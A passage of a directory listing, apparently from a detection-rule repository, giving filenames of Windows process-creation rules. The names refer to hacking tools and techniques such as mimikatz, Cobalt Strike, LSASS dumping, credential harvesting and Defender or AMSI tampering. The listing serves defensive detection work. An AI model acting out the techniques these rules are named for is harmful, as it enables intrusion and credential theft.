proc_creation_win_bitsadmin_download_susp_extensions.yml │ │ ├── proc_creation_win_bitsadmin_download_susp_targetfolder.yml │ │ ├── proc_creation_win_bitsadmin_potential_persistence.yml │ │ ├── proc_creation_win_browsers_chromium_headless_debugging.yml │ │ ├── proc_creation_win_browsers_chromium_headless_exec.yml │ │ ├── proc_creation_win_browsers_chromium_headless_file_download.yml │ │ ├── proc_creation_win_browsers_chromium_load_extension.yml │ │ ├── proc_creation_win_browsers_chromium_mockbin_abuse.yml │ │ ├── proc_creation_win_browsers_chromium_susp_load_extension.yml │ │ ├── 
proc_creation_win_browsers_inline_file_download.yml │ │ ├── proc_creation_win_browsers_remote_debugging.yml │ │ ├── proc_creation_win_browsers_tor_execution.yml │ │ ├── proc_creation_win_calc_uncommon_exec.yml │ │ ├── proc_creation_win_cdb_arbitrary_command_execution.yml │ │ ├── proc_creation_win_certmgr_certificate_installation.yml │ │ ├── proc_creation_win_certoc_download.yml │ │ ├── proc_creation_win_certoc_download_direct_ip.yml │ │ ├── proc_creation_win_certoc_load_dll.yml │ │ ├── proc_creation_win_certoc_load_dll_susp_locations.yml │ │ ├── proc_creation_win_certreq_download.yml │ │ ├── proc_creation_win_certutil_certificate_installation.yml │ │ ├── proc_creation_win_certutil_decode.yml │ │ ├── proc_creation_win_certutil_download.yml │ │ ├── proc_creation_win_certutil_download_direct_ip.yml │ │ ├── proc_creation_win_certutil_download_file_sharing_domains.yml │ │ ├── proc_creation_win_certutil_encode.yml │ │ ├── proc_creation_win_certutil_encode_susp_extensions.yml │ │ ├── proc_creation_win_certutil_encode_susp_location.yml │ │ ├── proc_creation_win_certutil_export_pfx.yml │ │ ├── proc_creation_win_certutil_ntlm_coercion.yml │ │ ├── proc_creation_win_chcp_codepage_lookup.yml │ │ ├── proc_creation_win_chcp_codepage_switch.yml │ │ ├── proc_creation_win_cipher_overwrite_deleted_data.yml │ │ ├── proc_creation_win_citrix_trolleyexpress_procdump.yml │ │ ├── proc_creation_win_clip_execution.yml │ │ ├── proc_creation_win_cloudflared_portable_execution.yml │ │ ├── proc_creation_win_cloudflared_quicktunnel_execution.yml │ │ ├── proc_creation_win_cloudflared_tunnel_cleanup.yml │ │ ├── proc_creation_win_cloudflared_tunnel_run.yml │ │ ├── proc_creation_win_cmd_assoc_execution.yml │ │ ├── proc_creation_win_cmd_assoc_tamper_exe_file_association.yml │ │ ├── proc_creation_win_cmd_copy_dmp_from_share.yml │ │ ├── proc_creation_win_cmd_curl_download_exec_combo.yml │ │ ├── proc_creation_win_cmd_del_execution.yml │ │ ├── proc_creation_win_cmd_del_greedy_deletion.yml │ │ ├── 
proc_creation_win_cmd_dir_execution.yml │ │ ├── proc_creation_win_cmd_dosfuscation.yml │ │ ├── proc_creation_win_cmd_http_appdata.yml │ │ ├── proc_creation_win_cmd_launched_with_hidden_start_flag.yml │ │ ├── proc_creation_win_cmd_mklink_osk_cmd.yml │ │ ├── proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml │ │ ├── proc_creation_win_cmd_net_use_and_exec_combo.yml │ │ ├── proc_creation_win_cmd_no_space_execution.yml │ │ ├── proc_creation_win_cmd_ntdllpipe_redirect.yml │ │ ├── proc_creation_win_cmd_path_traversal.yml │ │ ├── proc_creation_win_cmd_ping_copy_combined_execution.yml │ │ ├── proc_creation_win_cmd_ping_del_combined_execution.yml │ │ ├── proc_creation_win_cmd_redirection_susp_folder.yml │ │ ├── proc_creation_win_cmd_rmdir_execution.yml │ │ ├── proc_creation_win_cmd_shadowcopy_access.yml │ │ ├── proc_creation_win_cmd_stdin_redirect.yml │ │ ├── proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml │ │ ├── proc_creation_win_cmd_sticky_keys_replace.yml │ │ ├── proc_creation_win_cmd_type_arbitrary_file_download.yml │ │ ├── proc_creation_win_cmd_unusual_parent.yml │ │ ├── proc_creation_win_cmdkey_adding_generic_creds.yml │ │ ├── proc_creation_win_cmdkey_recon.yml │ │ ├── proc_creation_win_cmdl32_arbitrary_file_download.yml │ │ ├── proc_creation_win_cmstp_execution_by_creation.yml │ │ ├── proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml │ │ ├── proc_creation_win_configsecuritypolicy_download_file.yml │ │ ├── proc_creation_win_conhost_headless_powershell.yml │ │ ├── proc_creation_win_conhost_legacy_option.yml │ │ ├── proc_creation_win_conhost_path_traversal.yml │ │ ├── proc_creation_win_conhost_susp_child_process.yml │ │ ├── proc_creation_win_conhost_susp_winshell_child_process.yml │ │ ├── proc_creation_win_conhost_uncommon_parent.yml │ │ ├── proc_creation_win_control_panel_item.yml │ │ ├── proc_creation_win_createdump_lolbin_execution.yml │ │ ├── proc_creation_win_credential_guard_registry_tampering.yml │ │ ├── 
proc_creation_win_csc_susp_dynamic_compilation.yml │ │ ├── proc_creation_win_csc_susp_parent.yml │ │ ├── proc_creation_win_csi_execution.yml │ │ ├── proc_creation_win_csi_use_of_csharp_console.yml │ │ ├── proc_creation_win_csvde_export.yml │ │ ├── proc_creation_win_curl_cookie_hijacking.yml │ │ ├── proc_creation_win_curl_custom_user_agent.yml │ │ ├── proc_creation_win_curl_download_direct_ip_exec.yml │ │ ├── proc_creation_win_curl_download_direct_ip_susp_extensions.yml │ │ ├── proc_creation_win_curl_download_susp_file_sharing_domains.yml │ │ ├── proc_creation_win_curl_insecure_connection.yml │ │ ├── proc_creation_win_curl_insecure_proxy_or_doh.yml │ │ ├── proc_creation_win_curl_local_file_read.yml │ │ ├── proc_creation_win_curl_susp_download.yml │ │ ├── proc_creation_win_customshellhost_susp_exec.yml │ │ ├── proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml │ │ ├── proc_creation_win_defaultpack_uncommon_child_process.yml │ │ ├── proc_creation_win_defender_default_action_modified.yml │ │ ├── proc_creation_win_defender_remove_context_menu.yml │ │ ├── proc_creation_win_desktopimgdownldr_remote_file_download.yml │ │ ├── proc_creation_win_desktopimgdownldr_susp_execution.yml │ │ ├── proc_creation_win_devcon_disable_vmci_driver.yml │ │ ├── proc_creation_win_device_credential_deployment.yml │ │ ├── proc_creation_win_deviceenroller_dll_sideloading.yml │ │ ├── proc_creation_win_devinit_lolbin_usage.yml │ │ ├── proc_creation_win_dfsvc_suspicious_child_processes.yml │ │ ├── proc_creation_win_dirlister_execution.yml │ │ ├── proc_creation_win_discovery_via_reg_queries.yml │ │ ├── proc_creation_win_diskshadow_child_process_susp.yml │ │ ├── proc_creation_win_diskshadow_script_mode_susp_ext.yml │ │ ├── proc_creation_win_diskshadow_script_mode_susp_location.yml │ │ ├── proc_creation_win_dism_enable_powershell_web_access_feature.yml │ │ ├── proc_creation_win_dism_remove.yml │ │ ├── proc_creation_win_dll_sideload_vmware_xfer.yml │ │ ├── 
proc_creation_win_dllhost_no_cli_execution.yml │ │ ├── proc_creation_win_dns_exfiltration_tools_execution.yml │ │ ├── proc_creation_win_dns_susp_child_process.yml │ │ ├── proc_creation_win_dnscmd_discovery.yml │ │ ├── proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml │ │ ├── proc_creation_win_dnx_execute_csharp_code.yml │ │ ├── proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml │ │ ├── proc_creation_win_dotnet_trace_lolbin_execution.yml │ │ ├── proc_creation_win_dotnetdump_memory_dump.yml │ │ ├── proc_creation_win_driverquery_recon.yml │ │ ├── proc_creation_win_driverquery_usage.yml │ │ ├── proc_creation_win_dsacls_abuse_permissions.yml │ │ ├── proc_creation_win_dsacls_password_spray.yml │ │ ├── proc_creation_win_dsquery_domain_trust_discovery.yml │ │ ├── proc_creation_win_dtrace_kernel_dump.yml │ │ ├── proc_creation_win_dump64_defender_av_bypass_rename.yml │ │ ├── proc_creation_win_dumpminitool_execution.yml │ │ ├── proc_creation_win_dumpminitool_susp_execution.yml │ │ ├── proc_creation_win_dxcap_arbitrary_binary_execution.yml │ │ ├── proc_creation_win_esentutl_params.yml │ │ ├── proc_creation_win_esentutl_sensitive_file_copy.yml │ │ ├── proc_creation_win_esentutl_webcache.yml │ │ ├── proc_creation_win_event_logging_disable_via_key_minint.yml │ │ ├── proc_creation_win_eventvwr_susp_child_process.yml │ │ ├── proc_creation_win_expand_cabinet_files.yml │ │ ├── proc_creation_win_explorer_break_process_tree.yml │ │ ├── proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml │ │ ├── proc_creation_win_explorer_nouaccheck.yml │ │ ├── proc_creation_win_findstr_download.yml │ │ ├── proc_creation_win_findstr_gpp_passwords.yml │ │ ├── proc_creation_win_findstr_lnk.yml │ │ ├── proc_creation_win_findstr_lsass.yml │ │ ├── proc_creation_win_findstr_recon_everyone.yml │ │ ├── proc_creation_win_findstr_recon_pipe_output.yml │ │ ├── proc_creation_win_findstr_security_keyword_lookup.yml │ │ ├── proc_creation_win_findstr_subfolder_search.yml │ │ ├── 
proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml │ │ ├── proc_creation_win_finger_execution.yml │ │ ├── proc_creation_win_fltmc_unload_driver.yml │ │ ├── proc_creation_win_fltmc_unload_driver_sysmon.yml │ │ ├── proc_creation_win_forfiles_child_process_masquerading.yml │ │ ├── proc_creation_win_forfiles_proxy_execution_.yml │ │ ├── proc_creation_win_format_uncommon_filesystem_load.yml │ │ ├── proc_creation_win_fsi_fsharp_code_execution.yml │ │ ├── proc_creation_win_fsutil_drive_enumeration.yml │ │ ├── proc_creation_win_fsutil_symlinkevaluation.yml │ │ ├── proc_creation_win_fsutil_usage.yml │ │ ├── proc_creation_win_ftp_arbitrary_command_execution.yml │ │ ├── proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml │ │ ├── proc_creation_win_git_susp_clone.yml │ │ ├── proc_creation_win_github_self_hosted_runner.yml │ │ ├── proc_creation_win_googleupdate_susp_child_process.yml │ │ ├── proc_creation_win_gpg4win_decryption.yml │ │ ├── proc_creation_win_gpg4win_encryption.yml │ │ ├── proc_creation_win_gpg4win_portable_execution.yml │ │ ├── proc_creation_win_gpg4win_susp_location.yml │ │ ├── proc_creation_win_gpresult_execution.yml │ │ ├── proc_creation_win_gup_arbitrary_binary_execution.yml │ │ ├── proc_creation_win_gup_download.yml │ │ ├── proc_creation_win_gup_susp_child_process.yml │ │ ├── proc_creation_win_gup_suspicious_execution.yml │ │ ├── proc_creation_win_hh_chm_execution.yml │ │ ├── proc_creation_win_hh_chm_remote_download_or_execution.yml │ │ ├── proc_creation_win_hh_html_help_susp_child_process.yml │ │ ├── proc_creation_win_hh_susp_execution.yml │ │ ├── proc_creation_win_hktl_adcspwn.yml │ │ ├── proc_creation_win_hktl_bloodhound_sharphound.yml │ │ ├── proc_creation_win_hktl_c3_rundll32_pattern.yml │ │ ├── proc_creation_win_hktl_certify.yml │ │ ├── proc_creation_win_hktl_certipy.yml │ │ ├── proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml │ │ ├── proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml │ │ ├── 
proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml │ │ ├── proc_creation_win_hktl_cobaltstrike_process_patterns.yml │ │ ├── proc_creation_win_hktl_coercedpotato.yml │ │ ├── proc_creation_win_hktl_covenant.yml │ │ ├── proc_creation_win_hktl_crackmapexec_execution.yml │ │ ├── proc_creation_win_hktl_crackmapexec_execution_patterns.yml │ │ ├── proc_creation_win_hktl_crackmapexec_patterns.yml │ │ ├── proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml │ │ ├── proc_creation_win_hktl_createminidump.yml │ │ ├── proc_creation_win_hktl_dinjector.yml │ │ ├── proc_creation_win_hktl_doppelganger.yml │ │ ├── proc_creation_win_hktl_dumpert.yml │ │ ├── proc_creation_win_hktl_edr_freeze.yml │ │ ├── proc_creation_win_hktl_edrsilencer.yml │ │ ├── proc_creation_win_hktl_empire_powershell_launch.yml │ │ ├── proc_creation_win_hktl_empire_powershell_uac_bypass.yml │ │ ├── proc_creation_win_hktl_evil_winrm.yml │ │ ├── proc_creation_win_hktl_execution_via_imphashes.yml │ │ ├── proc_creation_win_hktl_execution_via_pe_metadata.yml │ │ ├── proc_creation_win_hktl_gmer.yml │ │ ├── proc_creation_win_hktl_handlekatz.yml │ │ ├── proc_creation_win_hktl_hashcat.yml │ │ ├── proc_creation_win_hktl_hollowreaper.yml │ │ ├── proc_creation_win_hktl_htran_or_natbypass.yml │ │ ├── proc_creation_win_hktl_hydra.yml │ │ ├── proc_creation_win_hktl_impacket_lateral_movement.yml │ │ ├── proc_creation_win_hktl_impacket_tools.yml │ │ ├── proc_creation_win_hktl_impersonate.yml │ │ ├── proc_creation_win_hktl_inveigh.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_clip.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_stdin.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_var.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_compress.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml │ │ ├── 
proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml │ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_var.yml │ │ ├── proc_creation_win_hktl_jlaive_batch_execution.yml │ │ ├── proc_creation_win_hktl_koadic.yml │ │ ├── proc_creation_win_hktl_krbrelay.yml │ │ ├── proc_creation_win_hktl_krbrelay_remote.yml │ │ ├── proc_creation_win_hktl_krbrelayup.yml │ │ ├── proc_creation_win_hktl_lazagne.yml │ │ ├── proc_creation_win_hktl_localpotato.yml │ │ ├── proc_creation_win_hktl_meterpreter_getsystem.yml │ │ ├── proc_creation_win_hktl_mimikatz_command_line.yml │ │ ├── proc_creation_win_hktl_pchunter.yml │ │ ├── proc_creation_win_hktl_powersploit_empire_default_schtasks.yml │ │ ├── proc_creation_win_hktl_powertool.yml │ │ ├── proc_creation_win_hktl_purplesharp_indicators.yml │ │ ├── proc_creation_win_hktl_pypykatz.yml │ │ ├── proc_creation_win_hktl_quarks_pwdump.yml │ │ ├── proc_creation_win_hktl_redmimicry_winnti_playbook.yml │ │ ├── proc_creation_win_hktl_relay_attacks_tools.yml │ │ ├── proc_creation_win_hktl_rubeus.yml │ │ ├── proc_creation_win_hktl_safetykatz.yml │ │ ├── proc_creation_win_hktl_secutyxploded.yml │ │ ├── proc_creation_win_hktl_selectmyparent.yml │ │ ├── proc_creation_win_hktl_sharp_chisel.yml │ │ ├── proc_creation_win_hktl_sharp_dpapi_execution.yml │ │ ├── proc_creation_win_hktl_sharp_impersonation.yml │ │ ├── proc_creation_win_hktl_sharp_ldap_monitor.yml │ │ ├── proc_creation_win_hktl_sharpersist.yml │ │ ├── proc_creation_win_hktl_sharpevtmute.yml │ │ ├── proc_creation_win_hktl_sharpldapwhoami.yml │ │ ├── proc_creation_win_hktl_sharpmove.yml │ │ ├── proc_creation_win_hktl_sharpsuccessor_execution.yml │ │ ├── proc_creation_win_hktl_sharpup.yml │ │ ├── proc_creation_win_hktl_sharpview.yml │ │ ├── proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml │ │ ├── proc_creation_win_hktl_silenttrinity_stager.yml │ │ ├── proc_creation_win_hktl_sliver_c2_execution_pattern.yml │ │ ├── proc_creation_win_hktl_soaphound_execution.yml │ │ ├── 
proc_creation_win_hktl_stracciatella_execution.yml │ │ ├── proc_creation_win_hktl_sysmoneop.yml │ │ ├── proc_creation_win_hktl_trufflesnout.yml │ │ ├── proc_creation_win_hktl_uacme.yml │ │ ├── proc_creation_win_hktl_wce.yml │ │ ├── proc_creation_win_hktl_winpeas.yml │ │ ├── proc_creation_win_hktl_winpwn.yml │ │ ├── proc_creation_win_hktl_wmiexec_default_powershell.yml │ │ ├── proc_creation_win_hktl_wsass.yml │ │ ├── proc_creation_win_hktl_xordump.yml │ │ ├── proc_creation_win_hktl_zipexec.yml │ │ ├── proc_creation_win_hostname_execution.yml │ │ ├── proc_creation_win_hvci_registry_tampering.yml │ │ ├── proc_creation_win_hwp_exploits.yml │ │ ├── proc_creation_win_hxtsr_masquerading.yml │ │ ├── proc_creation_win_icacls_deny.yml │ │ ├── proc_creation_win_ieexec_download.yml │ │ ├── proc_creation_win_iexpress_susp_execution.yml │ │ ├── proc_creation_win_iis_appcmd_http_logging.yml │ │ ├── proc_creation_win_iis_appcmd_service_account_password_dumped.yml │ │ ├── proc_creation_win_iis_appcmd_susp_module_install.yml │ │ ├── proc_creation_win_iis_appcmd_susp_rewrite_rule.yml │ │ ├── proc_creation_win_iis_connection_strings_decryption.yml │ │ ├── proc_creation_win_iis_logs_deletion.yml │ │ ├── proc_creation_win_iis_susp_module_registration.yml │ │ ├── proc_creation_win_ilasm_il_code_compilation.yml │ │ ├── proc_creation_win_imagingdevices_unusual_parents.yml │ │ ├── proc_creation_win_imewbdld_download.yml │ │ ├── proc_creation_win_infdefaultinstall_execute_sct_scripts.yml │ │ ├── proc_creation_win_installutil_download.yml │ │ ├── proc_creation_win_instalutil_no_log_execution.yml │ │ ├── proc_creation_win_java_keytool_susp_child_process.yml │ │ ├── proc_creation_win_java_manageengine_susp_child_process.yml │ │ ├── proc_creation_win_java_remote_debugging.yml │ │ ├── proc_creation_win_java_susp_child_process.yml │ │ ├── proc_creation_win_java_susp_child_process_2.yml │ │ ├── proc_creation_win_java_sysaidserver_susp_child_process.yml │ │ ├── proc_creation_win_jsc_execution.yml │ 
│ ├── proc_creation_win_kavremover_uncommon_execution.yml │ │ ├── proc_creation_win_kd_execution.yml │ │ ├── proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml │ │ ├── proc_creation_win_keyscrambler_susp_child_process.yml │ │ ├── proc_creation_win_ksetup_password_change_computer.yml │ │ ├── proc_creation_win_ksetup_password_change_user.yml │ │ ├── proc_creation_win_ldifde_export.yml │ │ ├── proc_creation_win_ldifde_file_load.yml │ │ ├── proc_creation_win_link_uncommon_parent_process.yml │ │ ├── proc_creation_win_lodctr_performance_counter_tampering.yml │ │ ├── proc_creation_win_logman_disable_eventlog.yml │ │ ├── proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml │ │ ├── proc_creation_win_lolbin_devtoolslauncher.yml │ │ ├── proc_creation_win_lolbin_diantz_ads.yml │ │ ├── proc_creation_win_lolbin_diantz_remote_cab.yml │ │ ├── proc_creation_win_lolbin_extrac32.yml │ │ ├── proc_creation_win_lolbin_extrac32_ads.yml │ │ ├── proc_creation_win_lolbin_gather_network_info.yml │ │ ├── proc_creation_win_lolbin_gpscript.yml │ │ ├── proc_creation_win_lolbin_ie4uinit.yml │ │ ├── proc_creation_win_lolbin_launch_vsdevshell.yml │ │ ├── proc_creation_win_lolbin_manage_bde.yml │ │ ├── proc_creation_win_lolbin_mavinject_process_injection.yml │ │ ├── proc_creation_win_lolbin_mpiexec.yml │ │ ├── proc_creation_win_lolbin_msdeploy.yml │ │ ├── proc_creation_win_lolbin_openconsole.yml │ │ ├── proc_creation_win_lolbin_openwith.yml │ │ ├── proc_creation_win_lolbin_pcalua.yml │ │ ├── proc_creation_win_lolbin_pcwrun.yml │ │ ├── proc_creation_win_lolbin_pcwrun_follina.yml │ │ ├── proc_creation_win_lolbin_pcwutl.yml │ │ ├── proc_creation_win_lolbin_pester.yml │ │ ├── proc_creation_win_lolbin_pester_1.yml │ │ ├── proc_creation_win_lolbin_printbrm.yml │ │ ├── proc_creation_win_lolbin_pubprn.yml │ │ ├── proc_creation_win_lolbin_rasautou_dll_execution.yml │ │ ├── proc_creation_win_lolbin_register_app.yml │ │ ├── proc_creation_win_lolbin_remote.yml │ │ ├── 
proc_creation_win_lolbin_replace.yml │ │ ├── proc_creation_win_lolbin_runexehelper.yml │ │ ├── proc_creation_win_lolbin_runscripthelper.yml │ │ ├── proc_creation_win_lolbin_scriptrunner.yml │ │ ├── proc_creation_win_lolbin_settingsynchost.yml │ │ ├── proc_creation_win_lolbin_sftp.yml │ │ ├── proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml │ │ ├── proc_creation_win_lolbin_susp_grpconv.yml │ │ ├── proc_creation_win_lolbin_susp_sqldumper_activity.yml │ │ ├── proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml │ │ ├── proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml │ │ ├── proc_creation_win_lolbin_tracker.yml │ │ ├── proc_creation_win_lolbin_ttdinject.yml │ │ ├── proc_creation_win_lolbin_tttracer_mod_load.yml │ │ ├── proc_creation_win_lolbin_unregmp2.yml │ │ ├── proc_creation_win_lolbin_utilityfunctions.yml │ │ ├── proc_creation_win_lolbin_visual_basic_compiler.yml │ │ ├── proc_creation_win_lolbin_visualuiaverifynative.yml │ │ ├── proc_creation_win_lolbin_vsiisexelauncher.yml │ │ ├── proc_creation_win_lolbin_wfc.yml │ │ ├── proc_creation_win_lolscript_register_app.yml │ │ ├── proc_creation_win_lsass_process_clone.yml │ │ ├── proc_creation_win_mftrace_child_process.yml │ │ ├── proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml │ │ ├── proc_creation_win_mmc_mmc20_lateral_movement.yml │ │ ├── proc_creation_win_mmc_rlo_abuse_pattern.yml │ │ ├── proc_creation_win_mmc_susp_child_process.yml │ │ ├── proc_creation_win_mode_codepage_russian.yml │ │ ├── proc_creation_win_mofcomp_execution.yml │ │ ├── proc_creation_win_mpcmdrun_dll_sideload_defender.yml │ │ ├── proc_creation_win_mpcmdrun_download_arbitrary_file.yml │ │ ├── proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml │ │ ├── proc_creation_win_msbuild_susp_parent_process.yml │ │ ├── proc_creation_win_msdt_answer_file_exec.yml │ │ ├── proc_creation_win_msdt_arbitrary_command_execution.yml │ │ ├── proc_creation_win_msdt_susp_cab_options.yml │ │ 
├── proc_creation_win_msdt_susp_parent.yml │ │ ├── proc_creation_win_msedge_proxy_download.yml │ │ ├── proc_creation_win_mshta_http.yml │ │ ├── proc_creation_win_mshta_inline_vbscript.yml │ │ ├── proc_creation_win_mshta_javascript.yml │ │ ├── proc_creation_win_mshta_lethalhta_technique.yml │ │ ├── proc_creation_win_mshta_susp_child_processes.yml │ │ ├── proc_creation_win_mshta_susp_execution.yml │ │ ├── proc_creation_win_mshta_susp_pattern.yml │ │ ├── proc_creation_win_msiexec_dll.yml │ │ ├── proc_creation_win_msiexec_embedding.yml │ │ ├── proc_creation_win_msiexec_execute_dll.yml │ │ ├── proc_creation_win_msiexec_install_quiet.yml │ │ ├── proc_creation_win_msiexec_install_remote.yml │ │ ├── proc_creation_win_msiexec_masquerading.yml │ │ ├── proc_creation_win_msiexec_web_install.yml │ │ ├── proc_creation_win_msix_ai_stub_execution.yml │ │ ├── proc_creation_win_msohtmed_download.yml │ │ ├── proc_creation_win_mspub_download.yml │ │ ├── proc_creation_win_msra_process_injection.yml │ │ ├── proc_creation_win_mssql_sqlps_susp_execution.yml │ │ ├── proc_creation_win_mssql_sqltoolsps_susp_execution.yml │ │ ├── proc_creation_win_mssql_susp_child_process.yml │ │ ├── proc_creation_win_mssql_veaam_susp_child_processes.yml │ │ ├── proc_creation_win_mstsc_rdp_hijack_shadowing.yml │ │ ├── proc_creation_win_mstsc_remote_connection.yml │ │ ├── proc_creation_win_mstsc_run_local_rdp_file.yml │ │ ├── proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml │ │ ├── proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml │ │ ├── proc_creation_win_msxsl_execution.yml │ │ ├── proc_creation_win_msxsl_remote_execution.yml │ │ ├── proc_creation_win_net_groups_and_accounts_recon.yml │ │ ├── proc_creation_win_net_share_unmount.yml │ │ ├── proc_creation_win_net_start_service.yml │ │ ├── proc_creation_win_net_stop_service.yml │ │ ├── proc_creation_win_net_use_mount_admin_share.yml │ │ ├── proc_creation_win_net_use_mount_internet_share.yml │ │ ├── proc_creation_win_net_use_mount_share.yml 
│ │ ├── proc_creation_win_net_use_network_connections_discovery.yml │ │ ├── proc_creation_win_net_use_password_plaintext.yml │ │ ├── proc_creation_win_net_user_add.yml │ │ ├── proc_creation_win_net_user_add_never_expire.yml │ │ ├── proc_creation_win_net_user_default_accounts_manipulation.yml │ │ ├── proc_creation_win_net_view_share_and_sessions_enum.yml │ │ ├── proc_creation_win_netsh_fw_add_rule.yml │ │ ├── proc_creation_win_netsh_fw_allow_program_in_susp_location.yml │ │ ├── proc_creation_win_netsh_fw_allow_rdp.yml │ │ ├── proc_creation_win_netsh_fw_delete_rule.yml │ │ ├── proc_creation_win_netsh_fw_disable.yml │ │ ├── proc_creation_win_netsh_fw_enable_group_rule.yml │ │ ├── proc_creation_win_netsh_fw_rules_discovery.yml │ │ ├── proc_creation_win_netsh_fw_set_rule.yml │ │ ├── proc_creation_win_netsh_helper_dll_persistence.yml │ │ ├── proc_creation_win_netsh_packet_capture.yml │ │ ├── proc_creation_win_netsh_port_forwarding.yml │ │ ├── proc_creation_win_netsh_port_forwarding_3389.yml │ │ ├── proc_creation_win_netsh_wifi_credential_harvesting.yml │ │ ├── proc_creation_win_nltest_execution.yml │ │ ├── proc_creation_win_nltest_recon.yml │ │ ├── proc_creation_win_node_abuse.yml │ │ ├── proc_creation_win_node_adobe_creative_cloud_abuse.yml │ │ ├── proc_creation_win_notepad_local_passwd_discovery.yml │ │ ├── proc_creation_win_nslookup_domain_discovery.yml │ │ ├── proc_creation_win_nslookup_poweshell_download.yml │ │ ├── proc_creation_win_ntdsutil_susp_usage.yml │ │ ├── proc_creation_win_ntdsutil_usage.yml │ │ ├── proc_creation_win_odbcconf_driver_install.yml │ │ ├── proc_creation_win_odbcconf_driver_install_susp.yml │ │ ├── proc_creation_win_odbcconf_exec_susp_locations.yml │ │ ├── proc_creation_win_odbcconf_register_dll_regsvr.yml │ │ ├── proc_creation_win_odbcconf_register_dll_regsvr_susp.yml │ │ ├── proc_creation_win_odbcconf_response_file.yml │ │ ├── proc_creation_win_odbcconf_response_file_susp.yml │ │ ├── proc_creation_win_odbcconf_uncommon_child_process.yml │ │ 
├── proc_creation_win_office_arbitrary_cli_download.yml │ │ ├── proc_creation_win_office_excel_dcom_lateral_movement.yml │ │ ├── proc_creation_win_office_exec_from_trusted_locations.yml │ │ ├── proc_creation_win_office_onenote_embedded_script_execution.yml │ │ ├── proc_creation_win_office_onenote_susp_child_processes.yml │ │ ├── proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml │ │ ├── proc_creation_win_office_outlook_execution_from_temp.yml │ │ ├── proc_creation_win_office_outlook_susp_child_processes.yml │ │ ├── proc_creation_win_office_outlook_susp_child_processes_remote.yml │ │ ├── proc_creation_win_office_spawn_exe_from_users_directory.yml │ │ ├── proc_creation_win_office_susp_child_processes.yml │ │ ├── proc_creation_win_office_winword_dll_load.yml │ │ ├── proc_creation_win_offlinescannershell_mpclient_sideloading.yml │ │ ├── proc_creation_win_pdqdeploy_execution.yml │ │ ├── proc_creation_win_pdqdeploy_runner_susp_children.yml │ │ ├── proc_creation_win_perl_inline_command_execution.yml │ │ ├── proc_creation_win_php_inline_command_execution.yml │ │ ├── proc_creation_win_ping_hex_ip.yml │ │ ├── proc_creation_win_pktmon_execution.yml │ │ ├── proc_creation_win_plink_port_forwarding.yml │ │ ├── proc_creation_win_plink_susp_tunneling.yml │ │ ├── proc_creation_win_powercfg_execution.yml │ │ ├── proc_creation_win_powershell_aadinternals_cmdlets_execution.yml │ │ ├── proc_creation_win_powershell_active_directory_module_dll_import.yml │ │ ├── proc_creation_win_powershell_add_windows_capability.yml │ │ ├── proc_creation_win_powershell_amsi_init_failed_bypass.yml │ │ ├── proc_creation_win_powershell_amsi_null_bits_bypass.yml │ │ ├── proc_creation_win_powershell_audio_capture.yml │ │ ├── proc_creation_win_powershell_base64_encoded_cmd.yml │ │ ├── proc_creation_win_powershell_base64_encoded_cmd_patterns.yml │ │ ├── proc_creation_win_powershell_base64_encoded_obfusc.yml │ │ ├── proc_creation_win_powershell_base64_frombase64string.yml │ │ ├── 
proc_creation_win_powershell_base64_hidden_flag.yml │ │ ├── proc_creation_win_powershell_base64_iex.yml │ │ ├── proc_creation_win_powershell_base64_invoke.yml │ │ ├── proc_creation_win_powershell_base64_mppreference.yml │ │ ├── proc_creation_win_powershell_base64_reflection_assembly_load.yml │ │ ├── proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml │ │ ├── proc_creation_win_powershell_base64_wmi_classes.yml │ │ ├── proc_creation_win_powershell_cl_invocation.yml │ │ ├── proc_creation_win_powershell_cl_loadassembly.yml │ │ ├── proc_creation_win_powershell_cl_mutexverifiers.yml │ │ ├── proc_creation_win_powershell_cmdline_convertto_securestring.yml │ │ ├── proc_creation_win_powershell_cmdline_reversed_strings.yml │ │ ├── proc_creation_win_powershell_cmdline_special_characters.yml │ │ ├── proc_creation_win_powershell_comobject_msi.yml │ │ ├── proc_creation_win_powershell_comobject_msi_remote.yml │ │ ├── proc_creation_win_powershell_computer_discovery_get_adcomputer.yml │ │ ├── proc_creation_win_powershell_console_history_file_access.yml │ │ ├── proc_creation_win_powershell_create_service.yml │ │ ├── proc_creation_win_powershell_decode_gzip.yml │ │ ├── proc_creation_win_powershell_decrypt_pattern.yml │ │ ├── proc_creation_win_powershell_defender_disable_feature.yml │ │ ├── proc_creation_win_powershell_defender_exclusion.yml │ │ ├── proc_creation_win_powershell_disable_defender_av_security_monitoring.yml │ │ ├── proc_creation_win_powershell_disable_firewall.yml │ │ ├── proc_creation_win_powershell_disable_ie_features.yml │ │ ├── proc_creation_win_powershell_downgrade_attack.yml │ │ ├── 